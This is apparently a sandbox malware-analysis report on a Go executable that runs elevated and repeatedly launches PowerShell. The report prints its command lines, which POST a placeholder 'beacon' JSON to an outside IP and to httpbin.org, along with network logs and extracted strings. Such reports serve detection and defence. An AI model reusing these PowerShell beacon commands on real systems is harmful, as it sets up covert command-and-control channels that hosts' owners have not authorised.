Oct 8, 2024 02:22:06.045519114 CEST	269	OUT	POST /post HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json Host: 44.207.250.251 Content-Length: 190 Expect: 100-continue Connection: Keep-Alive
Oct 8, 2024 02:22:06.392635107 CEST	190	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 64 22 3a 20 20 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 Data Ascii: { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	107.22.40.220	80	8124	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 02:22:30.479440928 CEST	266	OUT	POST /post HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json Host: httpbin.org Content-Length: 190 Expect: 100-continue Connection: Keep-Alive
Oct 8, 2024 02:22:30.834980965 CEST	190	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 64 22 3a 20 20 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 Data Ascii: { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things."}
Oct 8, 2024 02:22:30.951471090 CEST	25	IN	HTTP/1.1 100 Continue
Oct 8, 2024 02:22:31.086411953 CEST	1078	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 00:22:30 GMT Content-Type: application/json Content-Length: 848 Connection: keep-alive Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Data Raw: 7b 0a 20 20 22 61 72 67 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 64 61 74 61 22 3a 20 22 7b 5c 72 5c 6e 20 20 20 20 5c 22 64 5c 22 3a 20 20 5c 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 73 6f 6d 65 20 69 64 65 6e 74 69 66 69 65 72 2c 20 6f 72 20 73 6f 6d 65 20 76 61 6c 75 65 20 74 6f 20 69 6e 64 69 63 61 74 65 20 61 20 68 65 61 6c 74 68 79 20 69 6d 70 6c 61 6e 74 20 74 6f 20 74 68 65 20 43 32 20 73 65 72 76 65 72 2c 20 61 6d 6f 6e 67 20 6f 74 68 65 72 20 74 68 69 6e 67 73 2e 5c 22 5c 72 5c 6e 7d 22 2c 20 0a 20 20 22 66 69 6c 65 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 66 6f 72 6d 22 3a 20 7b 7d 2c 20 0a 20 20 22 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 22 3a 20 22 31 39 30 22 2c 20 0a 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e [TRUNCATED] Data Ascii: { "args": {}, "data": "{\r\n \"d\": \"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"\r\n}", "files": {}, "form": {}, "headers": { "Content-Length": "190", "Content-Type": "application/json", "Host": "httpbin.org", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "X-Amzn-Trace-Id": "Root=1-67047b46-02f5c2261c2ca1dc728c14a4" }, "json": { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things." }, "origin": "8.46.123.33", "url": "http://httpbin.org/post"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	44.207.250.251	80	7264	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 02:22:44.330173969 CEST	269	OUT	POST /post HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json Host: 44.207.250.251 Content-Length: 190 Expect: 100-continue Connection: Keep-Alive
Oct 8, 2024 02:22:44.680955887 CEST	190	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 64 22 3a 20 20 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 Data Ascii: { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49817	107.22.40.220	80	6024	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 02:23:10.424215078 CEST	266	OUT	POST /post HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json Host: httpbin.org Content-Length: 190 Expect: 100-continue Connection: Keep-Alive
Oct 8, 2024 02:23:10.780384064 CEST	190	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 64 22 3a 20 20 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 Data Ascii: { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things."}
Oct 8, 2024 02:23:10.888443947 CEST	25	IN	HTTP/1.1 100 Continue
Oct 8, 2024 02:23:11.019493103 CEST	1078	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 00:23:10 GMT Content-Type: application/json Content-Length: 848 Connection: keep-alive Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Data Raw: 7b 0a 20 20 22 61 72 67 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 64 61 74 61 22 3a 20 22 7b 5c 72 5c 6e 20 20 20 20 5c 22 64 5c 22 3a 20 20 5c 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 73 6f 6d 65 20 69 64 65 6e 74 69 66 69 65 72 2c 20 6f 72 20 73 6f 6d 65 20 76 61 6c 75 65 20 74 6f 20 69 6e 64 69 63 61 74 65 20 61 20 68 65 61 6c 74 68 79 20 69 6d 70 6c 61 6e 74 20 74 6f 20 74 68 65 20 43 32 20 73 65 72 76 65 72 2c 20 61 6d 6f 6e 67 20 6f 74 68 65 72 20 74 68 69 6e 67 73 2e 5c 22 5c 72 5c 6e 7d 22 2c 20 0a 20 20 22 66 69 6c 65 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 66 6f 72 6d 22 3a 20 7b 7d 2c 20 0a 20 20 22 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 22 3a 20 22 31 39 30 22 2c 20 0a 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e [TRUNCATED] Data Ascii: { "args": {}, "data": "{\r\n \"d\": \"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"\r\n}", "files": {}, "form": {}, "headers": { "Content-Length": "190", "Content-Type": "application/json", "Host": "httpbin.org", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "X-Amzn-Trace-Id": "Root=1-67047b6e-7bd7a7c362b7a5b2427fac97" }, "json": { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things." }, "origin": "8.46.123.33", "url": "http://httpbin.org/post"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49911	44.207.250.251	80	2212	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 02:23:26.304541111 CEST	269	OUT	POST /post HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json Host: 44.207.250.251 Content-Length: 190 Expect: 100-continue Connection: Keep-Alive
Oct 8, 2024 02:23:26.655222893 CEST	190	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 64 22 3a 20 20 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 Data Ascii: { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50007	34.236.15.216	80	7980	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 02:23:53.976160049 CEST	266	OUT	POST /post HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json Host: httpbin.org Content-Length: 190 Expect: 100-continue Connection: Keep-Alive
Oct 8, 2024 02:23:54.323323011 CEST	190	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 64 22 3a 20 20 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 Data Ascii: { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things."}
Oct 8, 2024 02:23:54.448137045 CEST	25	IN	HTTP/1.1 100 Continue
Oct 8, 2024 02:23:54.579260111 CEST	1078	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 00:23:54 GMT Content-Type: application/json Content-Length: 848 Connection: keep-alive Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Data Raw: 7b 0a 20 20 22 61 72 67 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 64 61 74 61 22 3a 20 22 7b 5c 72 5c 6e 20 20 20 20 5c 22 64 5c 22 3a 20 20 5c 22 54 68 69 73 20 69 73 20 62 65 61 63 6f 6e 20 74 72 61 66 66 69 63 2c 20 77 68 69 63 68 20 63 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 72 6f 6d 69 73 65 64 20 68 6f 73 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 73 6f 6d 65 20 69 64 65 6e 74 69 66 69 65 72 2c 20 6f 72 20 73 6f 6d 65 20 76 61 6c 75 65 20 74 6f 20 69 6e 64 69 63 61 74 65 20 61 20 68 65 61 6c 74 68 79 20 69 6d 70 6c 61 6e 74 20 74 6f 20 74 68 65 20 43 32 20 73 65 72 76 65 72 2c 20 61 6d 6f 6e 67 20 6f 74 68 65 72 20 74 68 69 6e 67 73 2e 5c 22 5c 72 5c 6e 7d 22 2c 20 0a 20 20 22 66 69 6c 65 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 66 6f 72 6d 22 3a 20 7b 7d 2c 20 0a 20 20 22 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 22 3a 20 22 31 39 30 22 2c 20 0a 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e [TRUNCATED] Data Ascii: { "args": {}, "data": "{\r\n \"d\": \"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"\r\n}", "files": {}, "form": {}, "headers": { "Content-Length": "190", "Content-Type": "application/json", "Host": "httpbin.org", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "X-Amzn-Trace-Id": "Root=1-67047b9a-0aa087bb2f0114901a6ce69b" }, "json": { "d": "This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things." }, "origin": "8.46.123.33", "url": "http://httpbin.org/post"}

Target ID:	0
Start time:	20:22:02
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe"
Imagebase:	0xa60000
File size:	1'817'088 bytes
MD5 hash:	EC294B697F39B8EC154B86E91BE6957E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	20:22:02
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	20:22:02
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:22:28
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:22:42
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 6024, Parent PID: 7576

General

Target ID:	8
Start time:	20:23:08
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 2212, Parent PID: 7576

General

Target ID:	10
Start time:	20:23:24
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 7980, Parent PID: 7576

General

Target ID:	11
Start time:	20:23:52
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Function 00A88C80 Relevance: 19.3, Strings: 15, Instructions: 555COMMON

Download Yara Rule

Strings

runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong, xrefs: 00A894BE
][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMayMroNDTNSTNULNaNNkoPC=PDTPKTPSTStdUTCVaiW, xrefs: 00A88FC5, 00A89433
bad summary databad symbol tablecastogscanstatuscontext canceledexec: no commandgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-, xrefs: 00A8908F, 00A8980C
runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningupdate during transition bytes failed with errno= to unused region of span2006-01-02T15:04:05Z07:002910383045673370361328125AUS Central Standard TimeAUS Eastern Sta, xrefs: 00A89545
, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefaidrinMessageBoxWMoveFileExWNandinagariNetShar, xrefs: 00A894DC
, ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOF, xrefs: 00A89005, 00A89025, 00A8946F, 00A8948F
runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong medium type but memory size because dotdotdot in, xrefs: 00A88FAA, 00A8940E
), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE, xrefs: 00A89045
] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1, xrefs: 00A8944F
] = (arraychdirclosedeferfalsefaultfilesgcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usagewrite B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= m, xrefs: 00A88FE5
runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stac, xrefs: 00A895C5
runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->, xrefs: 00A89065
, i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UT, xrefs: 00A89565
, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExSogdianS, xrefs: 00A894FA
, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceDwmGetWi, xrefs: 00A895E5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE$, ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOF$, i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UT$, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExSogdianS$, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceDwmGetWi$, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefaidrinMessageBoxWMoveFileExWNandinagariNetShar$] = (arraychdirclosedeferfalsefaultfilesgcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav 